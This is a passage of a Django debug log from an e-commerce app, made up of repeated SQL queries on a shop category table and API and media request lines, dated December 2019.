(0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 14:30:46,992 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 14:30:46,994 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 14:30:46,997 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 14:30:46,999 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 14:30:47,001 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 14:30:47,005 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 14:30:47,007 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 14:30:47,010 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 14:30:47,013 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 14:30:47,015 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 14:30:47] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-13 14:30:52,423 utils 20136 140506667599616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-13 14:30:52,429 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) [13/Dec/2019 14:30:52] "GET /api/v1/categories/6 HTTP/1.0" 200 956 DEBUG 2019-12-13 14:30:52,462 utils 20136 140506667599616 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 14:30:52,472 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 14:30:52,478 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 14:30:52,482 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 14:30:52,488 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 14:30:52,492 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 14:30:52,494 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 14:30:52,496 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 14:30:52,498 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 14:30:52,502 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 14:30:52,504 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 14:30:52,506 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 14:30:52,508 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 14:30:52,510 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 14:30:52,514 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 14:30:52,516 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 14:30:52,518 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 14:30:52,520 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 14:30:52,523 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 14:30:52,526 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 14:30:52,528 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 14:30:52,530 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 14:30:52,533 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 14:30:52,535 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 14:30:52,537 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 14:30:52,540 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 14:30:52,542 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 14:30:52,545 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 14:30:52,547 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 14:30:52,549 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 14:30:52,552 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 14:30:52,555 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 14:30:52,557 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 14:30:52,560 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 14:30:52,562 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 14:30:52,566 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 14:30:52,571 utils 20136 140506667599616 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 14:30:52,576 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 14:30:52,581 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 14:30:52,585 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 14:30:52,589 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 14:30:52,594 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 14:30:52,598 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 14:30:52,602 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 14:30:52,608 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 14:30:52,611 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 14:30:52] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [13/Dec/2019 14:30:52] "GET /media/categories/2019/12/13/collection6_4Q1Rpjs.png HTTP/1.0" 304 0 [13/Dec/2019 14:30:53] "GET /media/categories/2019/12/13/collection6.png HTTP/1.0" 304 0 [13/Dec/2019 14:30:53] "GET /media/categories/2019/12/13/collection3.png HTTP/1.0" 304 0 [13/Dec/2019 14:30:53] "GET /media/categories/2019/12/13/collection6_YoOFERO.png HTTP/1.0" 304 0 DEBUG 2019-12-13 14:31:11,805 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-13 14:31:11,813 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) [13/Dec/2019 14:31:11] "GET /api/v1/categories/6 HTTP/1.0" 200 956 DEBUG 2019-12-13 14:31:11,841 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 14:31:11,852 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 14:31:11,857 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 14:31:11,859 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 14:31:11,864 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 14:31:11,868 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", 